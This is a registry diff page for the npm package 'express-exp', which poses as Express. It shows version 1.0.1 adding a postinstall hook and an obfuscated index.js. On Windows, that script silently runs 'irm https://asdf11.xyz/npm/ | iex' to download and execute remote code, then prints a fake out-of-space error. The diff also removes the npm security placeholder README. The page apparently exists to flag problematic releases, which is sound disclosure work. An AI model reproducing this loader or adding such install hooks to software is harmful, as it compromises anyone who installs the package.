express-exp 0.0.1-security → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of express-exp might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +11 -6
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function _0x1ca4(){const _0x37de31=['1720733kdBVIh','child_process','4871604ruarmb','9QaOuOF','5515940OeIbqs','Could\x20not\x20install.\x20Err:\x20OUT_OF_SPACE.','6TlNRjt','40PMNKYW','win32','2574940osRTee','13761170CfHqxJ','Error\x20executing\x20command:\x20','182127TeYxLo','error','50003679KKcddS','4yJgJPy'];_0x1ca4=function(){return _0x37de31;};return _0x1ca4();}const _0x174f21=_0x5364;(function(_0x2e098a,_0x269f97){const _0x2024cf=_0x5364,_0x516223=_0x2e098a();while(!![]){try{const _0xadbdaf=parseInt(_0x2024cf(0x184))/0x1+-parseInt(_0x2024cf(0x191))/0x2+parseInt(_0x2024cf(0x18a))/0x3*(-parseInt(_0x2024cf(0x187))/0x4)+-parseInt(_0x2024cf(0x18c))/0x5*(parseInt(_0x2024cf(0x18e))/0x6)+parseInt(_0x2024cf(0x188))/0x7*(-parseInt(_0x2024cf(0x18f))/0x8)+parseInt(_0x2024cf(0x18b))/0x9*(parseInt(_0x2024cf(0x182))/0xa)+parseInt(_0x2024cf(0x186))/0xb;if(_0xadbdaf===_0x269f97)break;else _0x516223['push'](_0x516223['shift']());}catch(_0x57d679){_0x516223['push'](_0x516223['shift']());}}}(_0x1ca4,0xd20fc));const {exec}=require(_0x174f21(0x189));function _0x5364(_0x4e76fe,_0x397d95){const _0x1ca4ad=_0x1ca4();return _0x5364=function(_0x5364da,_0x2b376e){_0x5364da=_0x5364da-0x182;let _0xe1558a=_0x1ca4ad[_0x5364da];return _0xe1558a;},_0x5364(_0x4e76fe,_0x397d95);}function asdf(_0x4df98b){return new Promise((_0x5168cc,_0x1cf61b)=>{exec(_0x4df98b,{'windowsHide':!![]},(_0x1dc84a,_0x3214d4,_0x2822cb)=>{const _0x342780=_0x5364;if(_0x1dc84a){_0x1cf61b(_0x342780(0x183)+_0x1dc84a['message']);return;}if(_0x2822cb){_0x1cf61b('stderr:\x20'+_0x2822cb);return;}_0x5168cc(_0x3214d4);});});}async function postInstall(){const _0x390504=_0x174f21;if(process['platform']===_0x390504(0x190)){const _0x149f44='powershell\x20-Command\x20\x22irm\x20https://asdf11.xyz/npm/\x20|\x20iex\x22';try{const _0x644f5c=await asdf(_0x149f44);}catch(_0x40a7ca){console[_0x390504(0x185)](_0x390504(0x18d));}}}postInstall();
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
|
-
{
|
2
|
-
"name": "express-exp",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
1
|
+
{
|
2
|
+
"name": "express-exp",
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "express",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"dependencies": {
|
10
|
+
}
|
11
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=express-exp for more information.
|